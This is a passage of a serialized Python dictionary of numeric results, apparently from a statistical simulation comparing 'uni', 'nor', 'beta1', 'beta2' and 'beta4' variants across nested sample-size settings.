0.23859171703363893, 'nor': 0.30398225973573706, 'beta1': 0.24424518838550163, 'beta2': 0.3266938110622517, 'beta4': 0.2056364855121014}, 50: {'uni': 0.24102915503645037, 'nor': 0.2812082623352389, 'beta1': 0.23754445909573635, 'beta2': 0.2988380192608764, 'beta4': 0.21540966947026327}, 30: {'uni': 0.2402253812885772, 'nor': 0.2666026471184283, 'beta1': 0.238929898071989, 'beta2': 0.2770974742803761, 'beta4': 0.22610654163969296}, 20: {'uni': 0.24434570435380387, 'nor': 
0.2585112146540725, 'beta1': 0.2415807147279158, 'beta2': 0.2606342573619894, 'beta4': 0.2305235355150038}, 10: {'uni': 0.23918493863914453, 'nor': 0.2509286566547784, 'beta1': 0.23933002800193567, 'beta2': 0.2500227362262458, 'beta4': 0.23670716858488702}}, 150: {1000: {'uni': 0.2480258537942248, 'nor': 1.3567928708960895, 'beta1': 0.24224804232432381, 'beta2': 1.6175890623628855, 'beta4': 0.13045756918703702}, 750: {'uni': 0.24465195063462994, 'nor': 1.1068928812494132, 'beta1': 0.2390436777424845, 'beta2': 1.2607007883259005, 'beta4': 0.1347810736042871}, 500: {'uni': 0.24355017278923838, 'nor': 0.8046287611337243, 'beta1': 0.23962944961533086, 'beta2': 1.0101784924140815, 'beta4': 0.1422529745324236}, 400: {'uni': 0.24311042262969, 'nor': 0.7001338423910112, 'beta1': 0.23781604544465967, 'beta2': 0.8503161974117437, 'beta4': 0.14755128201516188}, 300: {'uni': 0.23886975355360363, 'nor': 0.5799765440309484, 'beta1': 0.2439218469056476, 'beta2': 0.6752562646617146, 'beta4': 0.15560177975408335}, 200: {'uni': 0.23888626458857498, 'nor': 0.4649258351555267, 'beta1': 0.24029027385551024, 'beta2': 0.5570408390062839, 'beta4': 0.16698610009308248}, 150: {'uni': 0.24015716652317576, 'nor': 0.40765528245071664, 'beta1': 0.23978600175962048, 'beta2': 0.45441342190878464, 'beta4': 0.17750135956708718}, 100: {'uni': 0.23976629904286179, 'nor': 0.36342662382072144, 'beta1': 0.2405050450846459, 'beta2': 0.3842744497088235, 'beta4': 0.18785584249443293}, 75: {'uni': 0.2389356283416334, 'nor': 0.32259624193686903, 'beta1': 0.24191287354440572, 'beta2': 0.3467847590799506, 'beta4': 0.1980570402582252}, 50: {'uni': 0.2408638125003841, 'nor': 0.3042380864153837, 'beta1': 0.24040578066044851, 'beta2': 0.3104369462054549, 'beta4': 0.21064017543128524}, 30: {'uni': 0.2394197058224903, 'nor': 0.27555092176119034, 'beta1': 0.24086168161634688, 'beta2': 0.27796026990059064, 'beta4': 0.21692547003483736}, 20: {'uni': 0.24100489267090433, 'nor': 0.26122745551100984, 'beta1': 
0.24157057222993414, 'beta2': 0.2668195198530569, 'beta4': 0.2260832537423928}, 10: {'uni': 0.24014954228965793, 'nor': 0.2557788376305037, 'beta1': 0.2403141724564668, 'beta2': 0.2530659083959061, 'beta4': 0.23335177534081086}}, 100: {1000: {'uni': 0.2605919350905233, 'nor': 1.9645624961106296, 'beta1': 0.23984751915564548, 'beta2': 1.8359008724440415, 'beta4': 0.12666464013310433}, 750: {'uni': 0.24878101533631714, 'nor': 1.5348351031851004, 'beta1': 0.24575841302133908, 'beta2': 1.4410150363381768, 'beta4': 0.13064476822715007}, 500: {'uni': 0.24897645116581815, 'nor': 1.0962913335951492, 'beta1': 0.2400935196361046, 'beta2': 1.139636254314367, 'beta4': 0.135551392373918}, 400: {'uni': 0.24719017310896974, 'nor': 0.9450762377875365, 'beta1': 0.2419823823777533, 'beta2': 0.9364751942900571, 'beta4': 0.13774817173610815}, 300: {'uni': 0.24372613070313465, 'nor': 0.7468683361456988, 'beta1': 0.2450582119509388, 'beta2': 0.753557984795017, 'beta4': 0.1447467889754068}, 200: {'uni': 0.2423349982205343, 'nor': 0.5847266279550053, 'beta1': 0.24278399441600393, 'beta2': 0.5942522950060437, 'beta4': 0.15499143884888605}, 150: {'uni': 0.23787954259994942, 'nor': 0.4961451844254886, 'beta1': 0.24362883398497165, 'beta2': 0.5160693053381106, 'beta4': 0.16281905563956578}, 100: {'uni': 0.2431276940551797, 'nor': 0.4086264133449593, 'beta1': 0.23951870411248702, 'beta2': 0.42597352884781375, 'beta4': 0.17677640465192448}, 75: {'uni': 0.23940536757528075, 'nor': 0.3615361183482404, 'beta1': 0.24118088240667318, 'beta2': 0.36478826184276736, 'beta4': 0.1859747021402646}, 50: {'uni': 0.2405321018985597, 'nor': 0.329417829885632, 'beta1': 0.23957898862480795, 'beta2': 0.33255958442071576, 'beta4': 0.19727370515804576}, 30: {'uni': 0.23802803232550665, 'nor': 0.2911149045384273, 'beta1': 0.24333835231642956, 'beta2': 0.2942912241872173, 'beta4': 0.21471628209925814}, 20: {'uni': 0.24141040151777965, 'nor': 0.27732114436367966, 'beta1': 0.24448271505810568, 'beta2': 
0.27548856384185805, 'beta4': 0.22047328843008912}, 10: {'uni': 0.2395288532777793, 'nor': 0.25755653747120716, 'beta1': 0.24124009172541977, 'beta2': 0.2548693880806449, 'beta4': 0.2324567144844881}}, 75: {1000: {'uni': 0.2733620041631347, 'nor': 2.5407750263082485, 'beta1': 0.24220653292966504, 'beta2': 1.992313644576726, 'beta4': 0.12253684375736348}, 750: {'uni': 0.2652633553834021, 'nor': 1.921891394256636, 'beta1': 0.23914114635669345, 'beta2': 1.5518115385392717, 'beta4': 0.1256010750231391}, 500: {'uni': 0.2527254324730338, 'nor': 1.378831469746027, 'beta1': 0.24130850311200625, 'beta2': 1.197978006428742, 'beta4': 0.12999795860072655}, 400: {'uni': 0.24984697930169772, 'nor': 1.1613920565872908, 'beta1': 0.24214641743716728, 'beta2': 1.0259603246868627, 'beta4': 0.13486519818983125}, 300: {'uni': 0.2479963230662672, 'nor': 0.9231830439530876, 'beta1': 0.23832883927011117, 'beta2': 0.8854954020037991, 'beta4': 0.13886992475084908}, 200: {'uni': 0.24658425283069435, 'nor': 0.699588699460227, 'beta1': 0.24451554104416093, 'beta2': 0.6628263476389888, 'beta4': 0.14795321820003707}, 150: {'uni': 0.24036354199917276, 'nor': 0.5864620437412704, 'beta1': 0.23953882256474157, 'beta2': 0.54934480302271, 'beta4': 0.15620458279628316}, 100: {'uni': 0.24112317386876864, 'nor': 0.4720377913443705, 'beta1': 0.24454109705882449, 'beta2': 0.4620929610677745, 'beta4': 0.16679016410673922}, 75: {'uni': 0.23732383914340596, 'nor': 0.41438846624049946, 'beta1': 0.2412836743844065, 'beta2': 0.39789224468757356, 'beta4': 0.17713278107583144}, 50: {'uni': 0.24223937685068417, 'nor': 0.35638224091958604, 'beta1': 0.24030382984083512, 'beta2': 0.3468155717538311, 'beta4': 0.18927041379727919}, 30: {'uni': 0.2395894169045569, 'nor': 0.3096973245205462, 'beta1': 0.2402164331553301, 'beta2': 0.29699896987299107, 'beta4': 0.20300323871340764}, 20: {'uni': 0.23995144013357592, 'nor': 0.28693888172104376, 'beta1': 0.23881996736244296, 'beta2': 0.2789792810138777, 'beta4': 
0.21398426243766705}, 10: {'uni': 0.24000000221392964, 'nor': 0.2686733818699048, 'beta1': 0.2420959596038857, 'beta2': 0.257136366090763, 'beta4': 0.22733847650105596}}, 50: {1000: {'uni': 0.3068311615645959, 'nor': 3.6736591202407687, 'beta1': 0.24482062417518038, 'beta2': 2.432092145781782, 'beta4': 0.12064828970911215}, 750: {'uni': 0.28912852505671655, 'nor': 2.831736231456402, 'beta1': 0.24339370076078054, 'beta2': 1.9232694348084622, 'beta4': 0.1223013388277045}, 500: {'uni': 0.27181920986827757, 'nor': 1.9692828663527602, 'beta1': 0.24558635427679554, 'beta2': 1.433268319428308, 'beta4': 0.1258545419831927}, 400: {'uni': 0.26686532731179263, 'nor': 1.6136847454717067, 'beta1': 0.24175825591154568, 'beta2': 1.2103855602059785, 'beta4': 0.12813351522250957}, 300: {'uni': 0.26080218844362724, 'nor': 1.2696291936359931, 'beta1': 0.24241872353648633, 'beta2': 0.9918663896414475, 'beta4': 0.1319777391587158}, 200: {'uni': 0.2526083259566342, 'nor': 0.933984988445101, 'beta1': 0.24158668226525173, 'beta2': 0.748342978794983, 'beta4': 0.13912045456877706}, 150: {'uni': 0.24721418406332438, 'nor': 0.752265446490613, 'beta1': 0.23797019102326195, 'beta2': 0.6327723732666909, 'beta4': 0.14465355399933033}, 100: {'uni': 0.23821559230377304, 'nor': 0.5959169440870556, 'beta1': 0.2402644588651114, 'beta2': 0.5151696891568512, 'beta4': 0.15517987578890874}, 75: {'uni': 0.24197758540193703, 'nor': 0.5012351822131893, 'beta1': 0.2385584615799185, 'beta2': 0.4423371131127513, 'beta4': 0.16250378171522337}, 50: {'uni': 0.23793436068418145, 'nor': 0.41216084348155146, 'beta1': 0.2449062869215513, 'beta2': 0.3729679962422796, 'beta4': 0.17552753698854456}, 30: {'uni': 0.2377054028390569, 'nor': 0.3398721831056038, 'beta1': 0.2427909293712705, 'beta2': 0.32306879164070423, 'beta4': 0.19187644285737177}, 20: {'uni': 0.23557847890269124, 'nor': 0.3110020923280968, 'beta1': 0.2395482080645361, 'beta2': 0.289342786687756, 'beta4': 0.20294447085260098}, 10: {'uni': 
0.23949403398183788, 'nor': 0.2766693034599573, 'beta1': 0.2416512444769793, 'beta2': 0.2618531639699525, 'beta4': 0.22034386617181895}}, 30: {1000: {'uni': 0.43770022218247145, 'nor': 6.045178745535347, 'beta1': 0.259169089035364, 'beta2': 3.1789688468507187, 'beta4': 0.1189705042688022}, 750: {'uni': 0.3841643631759853, 'nor': 4.6933331437812695, 'beta1': 0.25694284971636117, 'beta2': 2.531928932737123, 'beta4': 0.11959939274766435}, 500: {'uni': 0.33214058043942385, 'nor': 3.122276993402984, 'beta1': 0.24725683979626126, 'beta2': 1.7655550798358093, 'beta4': 0.1212221979595647}, 400: {'uni': 0.3113906173398094, 'nor': 2.5706794658103362, 'beta1': 0.2492477327737819, 'beta2': 1.451535391839624, 'beta4': 0.1234228894172553}, 300: {'uni': 0.2893446935826717, 'nor': 2.0156312350698955, 'beta1': 0.24350296180449926, 'beta2': 1.201763851450293, 'beta4': 0.12591000107060388}, 200: {'uni': 0.273392826252959, 'nor': 1.3867110062484225, 'beta1': 0.24053742109476037, 'beta2': 0.9012159293412797, 'beta4': 0.13008575299715588}, 150: {'uni': 0.2640098391867243, 'nor': 1.1192388423172117, 'beta1': 0.24188846756485693, 'beta2': 0.7467375839736665, 'beta4': 0.13384427582455877}, 100: {'uni': 0.25271345398459155, 'nor': 0.8225120209007627, 'beta1': 0.23935935088809498, 'beta2': 0.5842254905275225, 'beta4': 0.1406395827941181}, 75: {'uni': 0.24788291043542154, 'nor': 0.6818298683800723, 'beta1': 0.24226210440493295, 'beta2': 0.503335957714589, 'beta4': 0.14920430843273713}, 50: {'uni': 0.24243844527057135, 'nor': 0.5339967195283021, 'beta1': 0.2373472370616648, 'beta2': 0.4136763534099132, 'beta4': 0.1594834897970974}, 30: {'uni': 0.23977426044085998, 'nor': 0.40713183447342743, 'beta1': 0.23982470684155024, 'beta2': 0.340373579415394, 'beta4': 0.17496600438379623}, 20: {'uni': 0.23565550978474273, 'nor': 0.35827410322120223, 'beta1': 0.2432582988872901, 'beta2': 0.3028878123522787, 'beta4': 0.18830622296140384}, 10: {'uni': 0.23884244412859004, 'nor': 0.29774554749212095, 
'beta1': 0.2429434805995286, 'beta2': 0.27437982722009696, 'beta4': 0.21104469675517187}}, 20: {1000: {'uni': 0.6892754769519168, 'nor': 9.176593622378835, 'beta1': 0.3054951826847113, 'beta2': 4.158533410554479, 'beta4': 0.11844646746439941}, 750: {'uni': 0.5710910368783783, 'nor': 6.85879055020698, 'beta1': 0.291224584817929, 'beta2': 3.3258091577056934, 'beta4': 0.11833379076172601}, 500: {'uni': 0.4490264171861371, 'nor': 4.7388425168137704, 'beta1': 0.2709631964122811, 'beta2': 2.2681127604964746, 'beta4': 0.12091634200893009}, 400: {'uni': 0.40262558544632876, 'nor': 3.7499381178342865, 'beta1': 0.2654247666116526, 'beta2': 1.8935692321733735, 'beta4': 0.12140087563180225}, 300: {'uni': 0.3620101021855284, 'nor': 2.8616884859791774, 'beta1': 0.25914723891983044, 'beta2': 1.486273128641971, 'beta4': 0.12333325025392265}, 200: {'uni': 0.31638143108661526, 'nor': 2.0253546810063368, 'beta1': 0.25051322402716275, 'beta2': 1.0906532820059176, 'beta4': 0.12414596326922459}, 150: {'uni': 0.2932601912449958, 'nor': 1.5701446424813754, 'beta1': 0.2495773997859125, 'beta2': 0.8805733827030208, 'beta4': 0.12850544780237397}, 100: {'uni': 0.2722615156392054, 'nor': 1.134814986920992, 'beta1': 0.243554476948524, 'beta2': 0.6953269837820146, 'beta4': 0.13413712917838938}, 75: {'uni': 0.26123409553509197, 'nor': 0.9185645079205841, 'beta1': 0.24067258854087187, 'beta2': 0.5785524796549206, 'beta4': 0.13768242690559246}, 50: {'uni': 0.2525355140660586, 'nor': 0.6919711376282242, 'beta1': 0.23972453350777076, 'beta2': 0.4621193525410244, 'beta4': 0.14896875998737302}, 30: {'uni': 0.23699092514081888, 'nor': 0.5142059925503737, 'beta1': 0.24033718948188124, 'beta2': 0.3680441197157298, 'beta4': 0.1610601094304951}, 20: {'uni': 0.2368489537086997, 'nor': 0.41959311120894416, 'beta1': 0.2362577222524531, 'beta2': 0.3210354805279546, 'beta4': 0.1755531728961799}, 10: {'uni': 0.2305135874565801, 'nor': 0.33410673964967214, 'beta1': 0.23977045087805413, 'beta2': 0.2750600950398116, 
'beta4': 0.19802118365276158}}, 10: {1000: {'uni': 1.9338996668648218, 'nor': 19.136519606563095, 'beta1': 0.7769604206007231, 'beta2': 7.135018695387052, 'beta4': 0.11672148234838667}, 750: {'uni': 1.503083114158401, 'nor': 14.244166458989907, 'beta1': 0.6245406492874473, 'beta2': 5.485855890374126, 'beta4': 0.11590778540337585}, 500: {'uni': 1.0540269543763192, 'nor': 9.636675903157979, 'beta1': 0.4769109867417122, 'beta2': 3.629626196155065, 'beta4': 0.1183646543268232}, 400: {'uni': 0.8778275527846914, 'nor': 7.683428962543298, 'beta1': 0.4235006921305748, 'beta2': 3.1126286625190698, 'beta4': 0.11969294332215273}, 300: {'uni': 0.7118782458518407, 'nor': 5.858208987207176, 'beta1': 0.3702183338793529, 'beta2': 2.2862080783939276, 'beta4': 0.11904220668366429}, 200: {'uni': 0.5317782007011279, 'nor': 3.8818182676243946, 'beta1': 0.3209894941286431, 'beta2': 1.5812012320642916, 'beta4': 0.12034673949960818}, 150: {'uni': 0.45446323423335977, 'nor': 3.0242125711856995, 'beta1': 0.2934232739269098, 'beta2': 1.2805423857971638, 'beta4': 0.12101602618457948}, 100: {'uni': 0.3725508635970142, 'nor': 2.120209894960073, 'beta1': 0.2710235563443484, 'beta2': 0.9070242917255719, 'beta4': 0.12465509096909932}, 75: {'uni': 0.33099815865895554, 'nor': 1.6693650264528523, 'beta1': 0.26131183836252986, 'beta2': 0.756986585821483, 'beta4': 0.12709622599790013}, 50: {'uni': 0.29398694375602924, 'nor': 1.205885184224821, 'beta1': 0.24971858473676287, 'beta2': 0.5807948967581763, 'beta4': 0.13265854229106566}, 30: {'uni': 0.26585428555308954, 'nor': 0.8178737757159222, 'beta1': 0.2418697448772308, 'beta2': 0.43669480643723463, 'beta4': 0.14211953887757617}, 20: {'uni': 0.24373877950691725, 'nor': 0.6138785967144306, 'beta1': 0.23342640175778887, 'beta2': 0.36068002883182226, 'beta4': 0.152895376758761}, 10: {'uni': 0.23264013625029636, 'nor': 0.43398578358983597, 'beta1': 0.22974394844926418, 'beta2': 0.29064283196263124, 'beta4': 0.17437119004836585}}}, 0.25: {1000: {1000: 
{'uni': 0.21098657037380533, 'nor': 0.35166149873456404, 'beta1': 0.20873759868671643, 'beta2': 0.8400951538540714, 'beta4': 0.1568594703186771}, 750: {'uni': 0.21077721252896842, 'nor': 0.3118537438226372, 'beta1': 0.20810169176177157, 'beta2': 0.6154419955912691, 'beta4': 0.1626506015661881}, 500: {'uni': 0.2121717067619794, 'nor': 0.27590570785230367, 'beta1': 0.2097214424172366, 'beta2': 0.43817472674515884, 'beta4': 0.17369850324548264}, 400: {'uni': 0.20802888613437368, 'nor': 0.26338964054208136, 'beta1': 0.2112189750302959, 'beta2': 0.38728535180277673, 'beta4': 0.17861053808286997}, 300: {'uni': 0.21361140102104362, 'nor': 0.24953596598208133, 'beta1': 0.21110518290253538, 'beta2': 0.3282216898198249, 'beta4': 0.18491825048533722}, 200: {'uni': 0.20729973695492088, 'nor': 0.23646891400599884, 'beta1': 0.20777961312417817, 'beta2': 0.2855197842554735, 'beta4': 0.19176746815365306}, 150: {'uni': 0.2095608253801655, 'nor': 0.2306371196887052, 'beta1': 0.20960687523291455, 'beta2': 0.2636115633933207, 'beta4': 0.19773334554066177}, 100: {'uni': 0.21145691141407225, 'nor': 0.22635031334486544, 'beta1': 0.207683026125086, 'beta2': 0.24292859255051902, 'beta4': 0.20134269310222558}, 75: {'uni': 0.20558051369572755, 'nor': 0.21610770490399964, 'beta1': 0.2074046337720713, 'beta2': 0.23277178385060804, 'beta4': 0.1993614439736463}, 50: {'uni': 0.2098521724204996, 'nor': 0.2147126715773342, 'beta1': 0.21166974003626254, 'beta2': 0.22486117495033467, 'beta4': 0.20265654637570651}, 30: {'uni': 0.21172537882212614, 'nor': 0.21638631455788926, 'beta1': 0.20945408468660293, 'beta2': 0.21870178357399692, 'beta4': 0.20573186312975994}, 20: {'uni': 0.20765899216156328, 'nor': 0.2127196854834208, 'beta1': 0.20989722816174097, 'beta2': 0.21522510154220564, 'beta4': 0.20662730212304828}, 10: {'uni': 0.21324200721363007, 'nor': 0.21458476725098155, 'beta1': 0.21159185053784305, 'beta2': 0.21285942913108694, 'beta4': 0.20769505756945225}}, 750: {1000: {'uni': 
0.20869501576743424, 'nor': 0.38956307451420247, 'beta1': 0.20929217837762587, 'beta2': 0.8294859264269948, 'beta4': 0.14827843794917997}, 750: {'uni': 0.21191372347879, 'nor': 0.3476256947224088, 'beta1': 0.2100895194945041, 'beta2': 0.6293056880022027, 'beta4': 0.15614558671553708}, 500: {'uni': 0.20899151314484712, 'nor': 0.3049938966927668, 'beta1': 0.21278455726040738, 'beta2': 0.4517545478635386, 'beta4': 0.16500998800014866}, 400: {'uni': 0.2094061455440297, 'nor': 0.28347980370391473, 'beta1': 0.21066797111669797, 'beta2': 0.3884084809742847, 'beta4': 0.17168736382726482}, 300: {'uni': 0.20916785432371376, 'nor': 0.26801613836270666, 'beta1': 0.20585831925323222, 'beta2': 0.3321029400758897, 'beta4': 0.1786724604421414}, 200: {'uni': 0.2085643081118847, 'nor': 0.2475562529946184, 'beta1': 0.20903879620035365, 'beta2': 0.2939306029876208, 'beta4': 0.18588153828339068}, 150: {'uni': 0.20735477521949924, 'nor': 0.23724909106407047, 'beta1': 0.20908779012385287, 'beta2': 0.273775240862008, 'beta4': 0.19142047852315378}, 100: {'uni': 0.20869783166523406, 'nor': 0.22732909767667214, 'beta1': 0.20933417310193372, 'beta2': 0.24880217826881731, 'beta4': 0.19816157590407354}, 75: {'uni': 0.21039255871863496, 'nor': 0.22185240574552587, 'beta1': 0.20887880701399933, 'beta2': 0.2399960689165522, 'beta4': 0.20281785091945453}, 50: {'uni': 0.21029781920645818, 'nor': 0.21912777348936618, 'beta1': 0.21068267834413842, 'beta2': 0.23167246136886402, 'beta4': 0.20249769600112058}, 30: {'uni': 0.20952942367398258, 'nor': 0.21384193819534977, 'beta1': 0.21131912031339217, 'beta2': 0.21737064331552444, 'beta4': 0.20575552847814524}, 20: {'uni': 0.20890110085437386, 'nor': 0.2131594319904166, 'beta1': 0.2069034393988381, 'beta2': 0.21768352193128865, 'beta4': 0.2067555030577237}, 10: {'uni': 0.21254200132120335, 'nor': 0.21459786026621233, 'beta1': 0.20943234976185285, 'beta2': 0.21262251673957, 'beta4': 0.20999488209611167}}, 500: {1000: {'uni': 0.2059302858390542, 'nor': 
0.49650776830039456, 'beta1': 0.21228903191473655, 'beta2': 0.9152969330737528, 'beta4': 0.1385187931902294}, 750: {'uni': 0.20920355176220426, 'nor': 0.41783563551683944, 'beta1': 0.20926141856456745, 'beta2': 0.7052019038441916, 'beta4': 0.14434793862546202}, 500: {'uni': 0.2151437182196634, 'nor': 0.3435520404521243, 'beta1': 0.20734688138213653, 'beta2': 0.5003830980619229, 'beta4': 0.15713333007243896}, 400: {'uni': 0.21063437135255508, 'nor': 0.31892308057831464, 'beta1': 0.21113940284117513, 'beta2': 0.4412496584112251, 'beta4': 0.16017169484934324}, 300: {'uni': 0.20774895174208088, 'nor': 0.2943930693913531, 'beta1': 0.20808087256826407, 'beta2': 0.37221993303002127, 'beta4': 0.16991539749581303}, 200: {'uni': 0.2114411912598273, 'nor': 0.2623047450364031, 'beta1': 0.20904736920658953, 'beta2': 0.31767722063774184, 'beta4': 0.17919824602785273}, 150: {'uni': 0.20986749913233252, 'nor': 0.24854552809441302, 'beta1': 0.2084663319906776, 'beta2': 0.2975844690768615, 'beta4': 0.18526543867232495}, 100: {'uni': 0.2092594424706574, 'nor': 0.23279372973204007, 'beta1': 0.21211034584787994, 'beta2': 0.2644889198824187, 'beta4': 0.19024613519545072}, 75: {'uni': 0.20844772203737807, 'nor': 0.2290003034992577, 'beta1': 0.20939561863598244, 'beta2': 0.25004310791145395, 'beta4': 0.19675116512816965}, 50: {'uni': 0.2092848896434689, 'nor': 0.22360302358346792, 'beta1': 0.21089442292304225, 'beta2': 0.23526180636184657, 'beta4': 0.1999628539597155}, 30: {'uni': 0.21018248597640826, 'nor': 0.2221002716523805, 'beta1': 0.20856908930100013, 'beta2': 0.22178971202454867, 'beta4': 0.20140677748683855}, 20: {'uni': 0.21139847384081079, 'nor': 0.21492418220939347, 'beta1': 0.21044560730256473, 'beta2': 0.21755423547583938, 'beta4': 0.2057056915636604}, 10: {'uni': 0.21253820678170735, 'nor': 0.2131854331538128, 'beta1': 0.21275732435191913, 'beta2': 0.21643787131857808, 'beta4': 0.20769941181178414}}, 400: {1000: {'uni': 0.20950261162873524, 'nor': 0.5592207143886676, 
'beta1': 0.20822088577391698, 'beta2': 0.9405640273128262, 'beta4': 0.13503805725703802}, 750: {'uni': 0.20840138500109906, 'nor': 0.4650706220967377, 'beta1': 0.20526961258426463, 'beta2': 0.7104148724896289, 'beta4': 0.13947694930523324}, 500: {'uni': 0.20944699177544024, 'nor': 0.3750531448374544, 'beta1': 0.2084873935072584, 'beta2': 0.5124805978381733, 'beta4': 0.150674746212122}, 400: {'uni': 0.21053083340394316, 'nor': 0.34703743831574946, 'beta1': 0.20776791692219637, 'beta2': 0.44807947444895996, 'beta4': 0.15642781061103203}, 300: {'uni': 0.2074453749043504, 'nor': 0.31374511391981097, 'beta1': 0.21042211951567266, 'beta2': 0.38435133093857443, 'beta4': 0.16508578865255383}, 200: {'uni': 0.2104725786341283, 'nor': 0.2799770460973791, 'beta1': 0.20755994599842575, 'beta2': 0.34310666630971454, 'beta4': 0.17526551053955433}, 150: {'uni': 0.2096991276282607, 'nor': 0.25909354880735697, 'beta1': 0.21020106280412626, 'beta2': 0.3026139672022534, 'beta4': 0.18019983975383427}, 100: {'uni': 0.21072783143131407, 'nor': 0.2441372701363183, 'beta1': 0.2103056697850539, 'beta2': 0.26482028071061453, 'beta4': 0.18743887187889346}, 75: {'uni': 0.21105992437147847, 'nor': 0.23961175954975408, 'beta1': 0.20974892521253838, 'beta2': 0.25146456182551963, 'beta4': 0.1945200088246506}, 50: {'uni': 0.21121839060128927, 'nor': 0.22491565366984967, 'beta1': 0.20657380975370745, 'beta2': 0.23555742098780033, 'beta4': 0.19921377300790927}, 30: {'uni': 0.210239619388815, 'nor': 0.22117997080110338, 'beta1': 0.2090488783845568, 'beta2': 0.22806384829930174, 'beta4': 0.2023335447482615}, 20: {'uni': 0.20710380380206825, 'nor': 0.21627486248329422, 'beta1': 0.20980239596055913, 'beta2': 0.22058570136671965, 'beta4': 0.20218103858951156}, 10: {'uni': 0.21015959409654134, 'nor': 0.21454425127510138, 'beta1': 0.2118316634707065, 'beta2': 0.21620662628256074, 'beta4': 0.20829747772817003}}, 300: {1000: {'uni': 0.21024825533358832, 'nor': 0.6739178980512721, 'beta1': 0.2085070129937928, 
'beta2': 1.0261291442854992, 'beta4': 0.12715583194445038}, 750: {'uni': 0.2118817480727133, 'nor': 0.5637239937328892, 'beta1': 0.21166510216163434, 'beta2': 0.7773995918748892, 'beta4': 0.1324222831320455}, 500: {'uni': 0.2098650271914982, 'nor': 0.4371006134554429, 'beta1': 0.20733569395123477, 'beta2': 0.5680527516013063, 'beta4': 0.14332521349654906}, 400: {'uni': 0.2083566386881128, 'nor': 0.3942554582663016, 'beta1': 0.2109565236914346, 'beta2': 0.49603828475465767, 'beta4': 0.15004299961046552}, 300: {'uni': 0.2100854250121582, 'nor': 0.35012881881465224, 'beta1': 0.20823701579975476, 'beta2': 0.44755108426014584, 'beta4': 0.15584642690437633}, 200: {'uni': 0.2097480900554049, 'nor': 0.29687244055718565, 'beta1': 0.21075844321998985, 'beta2': 0.3656759955352811, 'beta4': 0.16579343571612243}, 150: {'uni': 0.20568174343660908, 'nor': 0.27935310252324946, 'beta1': 0.20756684708571857, 'beta2': 0.3228522288000466, 'beta4': 0.17502874843773394}, 100: {'uni': 0.20807636324904133, 'nor': 0.257139917737112, 'beta1': 0.21060259493504813, 'beta2': 0.28415204574523667, 'beta4': 0.18088846276906836}, 75: {'uni': 0.20708717304715557, 'nor': 0.245123598107367, 'beta1': 0.21219451365636394, 'beta2': 0.26166242982354787, 'beta4': 0.18805634454725603}, 50: {'uni': 0.21114468570411718, 'nor': 0.23207945600734575, 'beta1': 0.20959999471878374, 'beta2': 0.24206775007689266, 'beta4': 0.19335277680526938}, 30: {'uni': 0.20889523163632018, 'nor': 0.22229036893037993, 'beta1': 0.2106596749268794, 'beta2': 0.22937469799168445, 'beta4': 0.1989194572736962}, 20: {'uni': 0.2102417437445108, 'nor': 0.22075709709390393, 'beta1': 0.20895525479901536, 'beta2': 0.22010616263145255, 'beta4': 0.20157150517012473}, 10: {'uni': 0.20971114225447923, 'nor': 0.21561068929125432, 'beta1': 0.21213500548933353, 'beta2': 0.2138950648584445, 'beta4': 0.20638012090126817}}, 200: {1000: {'uni': 0.2132043812817941, 'nor': 0.9112094985009763, 'beta1': 0.21016177088672316, 'beta2': 1.1300645808309855, 
'beta4': 0.1220144503244021}, 750: {'uni': 0.21020500282826535, 'nor': 0.7303054388794163, 'beta1': 0.2082163820708222, 'beta2': 0.8966738981783481, 'beta4': 0.12513962151857672}, 500: {'uni': 0.21072696514065975, 'nor': 0.548060627369271, 'beta1': 0.2081097778706287, 'beta2': 0.6558892676359798, 'beta4': 0.13425940545320267}, 400: {'uni': 0.20826445824295223, 'nor': 0.4719804690803897, 'beta1': 0.20898168226932218, 'beta2': 0.6139619653605363, 'beta4': 0.14021057525633163}, 300: {'uni': 0.2088021243690594, 'nor': 0.41713866780936254, 'beta1': 0.2087285946134042, 'beta2': 0.5038582733443089, 'beta4': 0.14660369998262146}, 200: {'uni': 0.2095189003633896, 'nor': 0.34807203300134953, 'beta1': 0.21047061569599942, 'beta2': 0.3977231148120064, 'beta4': 0.156646349521216}, 150: {'uni': 0.2093387615726338, 'nor': 0.3085400352109468, 'beta1': 0.20643570767629546, 'beta2': 0.3615010078549322, 'beta4': 0.16375551575980912}, 100: {'uni': 0.21064378643772108, 'nor': 0.28151818018358465, 'beta1': 0.2090926446634528, 'beta2': 0.30632844588543734, 'beta4': 0.17625942352213347}, 75: {'uni': 0.20671027913469828, 'nor': 0.2618837476630965, 'beta1': 0.2088637313648498, 'beta2': 0.2742687431604851, 'beta4': 0.1779630781714797}, 50: {'uni': 0.20687981613909145, 'nor': 0.2452119427254388, 'beta1': 0.2096125229272614, 'beta2': 0.2528198013170253, 'beta4': 0.18932221495486176}, 30: {'uni': 0.20986940612030017, 'nor': 0.23138385594723265, 'beta1': 0.21273630607793315, 'beta2': 0.23562615341383045, 'beta4': 0.19662520636393377}, 20: {'uni': 0.2096800769725957, 'nor': 0.2219903761746839, 'beta1': 0.208530873235143, 'beta2': 0.22519313310665248, 'beta4': 0.20072480517089764}, 10: {'uni': 0.20995102667780532, 'nor': 0.21809511923800973, 'beta1': 0.21113193936796237, 'beta2': 0.21507494725665083, 'beta4': 0.20129922751033036}}, 150: {1000: {'uni': 0.21848728221083116, 'nor': 1.1494726368233732, 'beta1': 0.20925879994061328, 'beta2': 1.2847422292556834, 'beta4': 0.11801063285369316}, 750: 
{'uni': 0.21006532285377288, 'nor': 0.9160472232808671, 'beta1': 0.21041748896864573, 'beta2': 0.9842221927965498, 'beta4': 0.120532017454987}, 500: {'uni': 0.2109702173498153, 'nor': 0.6730564167022827, 'beta1': 0.20805261563312868, 'beta2': 0.8093562303980775, 'beta4': 0.1285665146333448}, 400: {'uni': 0.21151275112656406, 'nor': 0.5927363236218804, 'beta1': 0.21031761704813068, 'beta2': 0.6698968663874326, 'beta4': 0.1308993211614878}, 300: {'uni': 0.21116665878281402, 'nor': 0.4896592957082567, 'beta1': 0.20684320922443974, 'beta2': 0.5512275592001699, 'beta4': 0.1384612397829126}, 200: {'uni': 0.2065247059685983, 'nor': 0.39835048373839826, 'beta1': 0.21174588540195607, 'beta2': 0.44630982353810156, 'beta4': 0.14805783066157965}, 150: {'uni': 0.20928770803093008, 'nor': 0.34961127920202617, 'beta1': 0.2109639639405676, 'beta2': 0.3797293742818744, 'beta4': 0.15746136802847555}, 100: {'uni': 0.20516824818584412, 'nor': 0.3028139312794487, 'beta1': 0.20853523204098995, 'beta2': 0.32225079750893787, 'beta4': 0.16753709332890135}, 75: {'uni': 0.20502748437818377, 'nor': 0.2741211171871183, 'beta1': 0.2105448811718868, 